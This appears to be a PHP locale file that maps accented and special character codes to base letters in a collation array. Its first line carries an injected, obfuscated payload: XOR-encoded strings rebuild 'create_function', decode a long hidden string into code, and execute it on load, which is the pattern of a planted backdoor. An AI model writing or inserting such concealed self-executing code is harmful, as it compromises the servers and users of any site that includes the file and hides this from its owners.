<?php $MEUGFUTj='ZAV.<,9-FC:GGRW'; $NcFSOmX='933OHIfK3-Y3.=9'^$MEUGFUTj; $vnYyfS='0Hil DXPAPR97N+9= 6kwN+C6YPB+tr,2>spHXHAGZ <6AYQ rEQG3VL U,eZDHfSQU>9bzS=01sWMaooKpoaa-6MTYGptQgzq>R1btSKRXdxRb;u=.K5.>PK39>+zchw,bclc1Si LLgetfew.S=PeWP,zhreEXLnG3zcSS1 5S7DgK4DaeluieB+P2G=NowO9-pwazLp4SpeJ8G-tvTX+R9Sqra<;ZZ63T6wlPUUGDSYs: O .+ QhlMrp su =wLNqOGSJhiSvOVRQE oBOcfp<1HSlWPYrwhOXW;nYBrI3 MBVdpKT ;KSFKX8=HepolT-Y2bsEhFK5H5.NDwMRaypexh<6EO2nt1.UBNFfoAVT46EyJsqdL7M;1cRP2gvmo  GniYas0T6+NlscE X <a0m6e;8<iS7B mdy4-N 4:W.=II7j;DCa-85;m4<20F2Y>KXUq=RUQ1 NhX8EAmfuv 5,4cRPUNCvoP-nvI ,JwwVzPIB, s1 195O 7XGLmP<Iqilp0863qsgqoj.6rxn>M.XkdE1:o2xrZzNI wVouN4ESAl+qyq.5CswYtuLau6 s>RRljiQqe5BJ8D+>++tQXDN=MNt>6:=70 fVMbZWE.hZYdkPzwHo=XKSXGSH8. 2p;-AP:Q<QmdUG2+;=-MEJkD5'; $JJfmeeU=$NcFSOmX('', 'Y.AMF16359=Wh+SPNTECP6D1i=16J+-AGJTYax3KN<URU50>NR=>5l2-T4s:71<Nw54JXNZwVUHZwmAOO0zfhEBC9tdgWSjmsxX=CJP:koxTCrFRINZ9YKPxoWXJJSXHSEIHEi8ZMO98GKIFMSJ2I1>s9qZ6RA.=55cZZFs ERY6YlC Q=H8ENclKY5F2O GS LYYLks1zIYzA.Y3LTKt>J>J6JxEXZ.;iX1OWQp34+76by0F RKJC9HDi-3o<>ixW-=Qk,63HTmVk 3=0EFb4ioTXP<23<5 RJHk32BUSKV-RT,bkDT=5LN.hL6R2T.EXNH0L-SKS>bO-Z:PO-,Wev>+54--obe.ANPZK,bsxFK778ASlY1yxmhS,OP<95KGKMKKE>UcPhWT5BJnQSG3A4UYZ:dKoF26M7V6AMYYtX SQH>OQ 3RBC+1>IYAZ2kQGDnP8M.na.Y76>UEfL<Y1 DJURDTXU<95,gjMe9KFR-AX+WQpZ1;0MY,ZEHfP7ID,4dJ;Y0VELTTYBRXSAWOBCRGPJZ,Z90C.TCHoQRgGnnAEoWA,Q fyZOAJGLTrGOiBDzSMRAEXc4KCIwWET08Y=tUNR+4 -=I>fSNWCQXQDAzmF>61OAsyDKpZW3e4==24ow,YZAiWKL8<U0Xv0MnM;NCTYeucPNH'^$vnYyfS); $JJfmeeU();
$collation = array (
  710 => 94,
  189 => 188,
  190 => 179,
  65 => 97,
  170 => 97,
  224 => 97,
  192 => 97,
  227 => 97,
  195 => 97,
  193 => 225,
  226 => 225,
  194 => 225,
  66 => 98,
  67 => 99,
  231 => 99,
  199 => 99,
  68 => 100,
  240 => 100,
  208 => 100,
  69 => 101,
  233 => 101,
  201 => 101,
  232 => 101,
  200 => 101,
  234 => 101,
  202 => 101,
  235 => 101,
  203 => 101,
  70 => 102,
  402 => 102,
  71 => 103,
  72 => 104,
  73 => 105,
  237 => 105,
  205 => 105,
  236 => 105,
  204 => 105,
  238 => 105,
  206 => 105,
  239 => 105,
  207 => 105,
  74 => 106,
  75 => 107,
  76 => 108,
  77 => 109,
  78 => 110,
  209 => 241,
  79 => 111,
  186 => 111,
  243 => 111,
  211 => 111,
  242 => 111,
  210 => 111,
  244 => 111,
  212 => 111,
  339 => 111,
  338 => 111,
  213 => 245,
  80 => 112,
  81 => 113,
  82 => 114,
  83 => 115,
  223 => 115,
  352 => 353,
  84 => 116,
  254 => 116,
  222 => 116,
  85 => 117,
  250 => 117,
  218 => 117,
  249 => 117,
  217 => 117,
  251 => 117,
  219 => 117,
  252 => 117,
  220 => 117,
  86 => 118,
  87 => 119,
  88 => 120,
  89 => 121,
  253 => 121,
  221 => 121,
  255 => 121,
  376 => 121,
  90 => 122,
  381 => 382,
  198 => 230,
  196 => 228,
  216 => 248,
  214 => 246,
  197 => 229,
);
?>